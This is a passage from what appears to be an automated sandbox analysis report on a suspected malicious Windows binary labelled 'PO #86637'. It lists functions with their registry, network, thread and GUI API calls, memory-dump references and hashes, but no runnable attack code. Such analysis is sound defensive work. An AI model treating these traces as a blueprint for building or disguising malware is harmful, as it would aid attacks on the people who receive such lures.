                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                      • __lock.LIBCMT ref: 004179A2
                      • ___addlocaleref.LIBCMT ref: 004179C0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                      • String ID: KERNEL32.DLL$pI
                      • API String ID: 637971194-197072765
                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                      Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$_malloc
                      • String ID:
                      • API String ID: 1938898002-0
                      • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                      • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                      Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                      • String ID:
                      • API String ID: 3771399671-0
                      • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                      • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                      • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                      • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                      Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                      • _memmove.LIBCMT ref: 0044B555
                      • _memmove.LIBCMT ref: 0044B578
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                      • String ID:
                      • API String ID: 2737351978-0
                      • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                      • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                      Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                      Download Yara Rule
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                      • __calloc_crt.LIBCMT ref: 00415246
                      • __getptd.LIBCMT ref: 00415253
                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                      • _free.LIBCMT ref: 0041529E
                      • __dosmaperr.LIBCMT ref: 004152A9
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                      • String ID:
                      • API String ID: 3638380555-0
                      • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                      • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                      Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Copy$ClearErrorInitLast
                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 3207048006-625585964
                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                      Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                      • gethostbyname.WSOCK32(?), ref: 004655A6
                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                      • _memmove.LIBCMT ref: 004656CA
                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                      • WSACleanup.WSOCK32 ref: 00465762
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                      • String ID:
                      • API String ID: 2945290962-0
                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                      Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                      • String ID:
                      • API String ID: 1457242333-0
                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                      Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ConnectRegistry_memmove_wcslen
                      • String ID:
                      • API String ID: 15295421-0
                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                      Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • _wcstok.LIBCMT ref: 004675B2
                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                      • _wcscpy.LIBCMT ref: 00467641
                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                      • _wcslen.LIBCMT ref: 00467793
                      • _wcslen.LIBCMT ref: 004677BD
                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                      • String ID: X
                      • API String ID: 780548581-3081909835
                      • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                      • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                      Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                      • CloseFigure.GDI32(?), ref: 0044751F
                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                      • String ID:
                      • API String ID: 4082120231-0
                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                      Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                      • String ID:
                      • API String ID: 2027346449-0
                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                      Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                      • GetMenu.USER32 ref: 0047A703
                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                      • _wcslen.LIBCMT ref: 0047A79E
                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                      • String ID:
                      • API String ID: 3257027151-0
                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                      Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                      Download Yara Rule
                      APIs
                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
